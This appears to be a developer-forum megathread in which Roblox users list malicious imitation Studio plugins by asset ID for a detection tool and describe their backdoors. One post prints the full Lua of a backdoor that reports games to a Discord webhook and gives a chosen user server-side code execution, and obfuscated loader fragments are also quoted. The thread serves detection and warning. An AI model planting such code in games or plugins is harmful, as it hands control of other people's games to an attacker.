Known Malicious Plugins for HISR detection Megathread

Thank you for your post, I see it helpful. Also it’s a surprise to find an HR of BH here. <3

Original: https://www.roblox.com/library/2233768483/Roundify
Malicious: https://www.roblox.com/library/5110767026/10K-Roundify
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Original: https://www.roblox.com/library/165687726/Stravant-GapFill-Extrude-Fixed
Malicious: https://www.roblox.com/library/5112442161/GapFill-V1-2
Malicious action: obfuscated script - can’t be bothered to constant dump it.

Malicious: https://www.roblox.com/library/5112424591/Load-Character-Pro
Malicious: https://www.roblox.com/library/5112436389/Model-Resize-Plugin-2-1-DRAG-TO-RESIZE
Malicious: https://www.roblox.com/library/5112432545/Building-Tools-by-F3X-Plugin

Malicious: https://www.roblox.com/library/5074555023/Better-Day-And-Night-Lighting-NEW
Malicious action: require(5077231493)

Malicious Script, plugin unknown

require(4751241292)()

Malicious Action

local Orig = script
script = nil
local script = Orig
local GUI = script.getwet:Clone()
local HTTP = game:GetService('HttpService')
function CheckHttp()
	local f = pcall(function()HTTP:GetAsync'https://www.google.com'end)
	if f == true then
		return true
	else
		return false
	end
end
game:GetService('Players').PlayerAdded:Connect(function(plr)
	local A = CheckHttp()
	
	if A == true then
	local Data = {
		content = "omfg a damn game!\n https://www.roblox.com/games/"..game.PlaceId.."\nPlayers in game: "..#game:GetService('Players'):GetPlayers().." / "..game:GetService('Players').MaxPlayers;
		username = "wet man"
	}
	HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
	end
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end)
for i,plr in pairs(game:GetService('Players'):GetPlayers()) do
	if plr.UserId == 1460281907 or plr:IsFriendsWith(1460281907) then
		GUI:Clone().Parent = plr.PlayerGui
	end
end
local A = CheckHttp()
if A == true then
local Data = {
	content = "omg a game!  https://www.roblox.com/games/"..game.PlaceId;
	username = "wet man"
}
HTTP:PostAsync('https://discordapp.com/a-key',HTTP:JSONEncode(Data))
end
return function()end

Essentially gives a serverside loadstring gui if a player is or is friends with…

https://www.roblox.com/users/1460281907/profile

Edit: Discord webhook has already been found invalidated, someone else probably already deleted it.

Fake content deleted backdoor.
Super long chain of ‘require’ to try to hide the main code, still going.

after chaining for an entire 30+ times, randomly manually ‘report abuse’ on some of them
reached the obfuscated code.

I’m not bothering to go in full detail on why I believe this is malicious due to having an alternative issue that I consider to be ‘robloxsev ere’

This plugin is possibly malicious:

I checked the source code, and the code appears to be obfuscated. Comments are also disabled, which is a tad bit suspicious for a plugin with obfuscated code.

Malicious

.return(function(AdminLoader_f,AdminLoader_a,AdminLoader_p)local AdminLoader_n=string.char;local AdminLoader_j=string.sub;local AdminLoader_o=table.concat;local AdminLoader_k=math.ldexp;local AdminLoader_r=getfenv or function()return _ENV end; (etc.)

Malicious

RStudioUpdate & Script contain obfuscated code

Real Roundify

Edit: The account behind the 2nd one appears to have tons of MainModules and a plugin called ‘virus’ in his inventory

** Tag Editor**
Original: 948084095
Malicious: 4972325708

Creates an Antilag script in ServerScriptService upon installation.

F3X Building Tools & LoadCharacter.

If someone can check these plugins, these were all botted to the front page and probably insert serversides. (if I’m correct)

Malicious plugin(s): 5754612786, 5864780072
Original plugin: 752585459

Malicous: 5747884333, 5747884333, 5727376746, and much more.
Original: 144950355

Also, It isn’t even possible to find a original plugin anymore 60% of the time.

Screen Shot 2020-10-25 at 1.51.52 PM1558×1110 159 KB

Screen Shot 2020-10-25 at 1.55.12 PM1602×1140 582 KB

Probably any plugin made by the group PluginMakers is malicious, as they make “updated” plugins.

Every plugin that has an Updated/New mark at the top of the plugin thumbnail is backdoored.

Roblox Studio+ (Updated

Backdoored: 5770454604

There isn’t a Roblox Studio+ original model, and the model leads to:

getfenv()[string.reverse("\101\114\105\117\113\101\114")](5770442639)

Which in return leads to a model called Linker which links to an asset named Poseidon SS. Another serverside which looks heavily skidded.

Why does this point to a “dummy.com” URL ? Is that normal? It looks suspicious, but neither HISR nor Ro-Defender detected anything bad.

The Plugin in Question is https://www.roblox.com/library/5722540246/AutoScale
By https://www.roblox.com/groups/7840914/Creator-Studi#!/about

dummy.com or google.com are usually domains that serversides use for non http game logging.

Fake : AutoScale Lite - Roblox
Real : AutoScale Lite - Roblox

Fake : Waterfall Generator - Roblox
Real : Waterfall Generator - Roblox

Fake : Building Tools by F3X (Plugin) - Roblox
Real : Building Tools by F3X (Plugin) - Roblox

How can you log games with google.com or dummy.com? They use discord.

They check if https service is enabled by sending a GET request to those urls, if it fails, it’s disabled, if it succeeds, then it’s enabled

Still, they mostly use discord.com/webhookurlhere.

No duh, of course they do that to send the game to the logs

They do that to send to logs and they usually use it for checking if HTTP is enabled.

(desterify said that they log games with google.com, which they dont)

Bubble Chat

Original: Unknown
Malicious: 5654074784

Drops a “Rain” script to Workspace.Terrain that is obfuscated. Sourcecode has also the rain code and it duplicates it to the terrain.

malicious1546×662 54.5 KB

hey, can you please tell me more about poseidon ss. I got it in my game and i do not know how to get rid of it .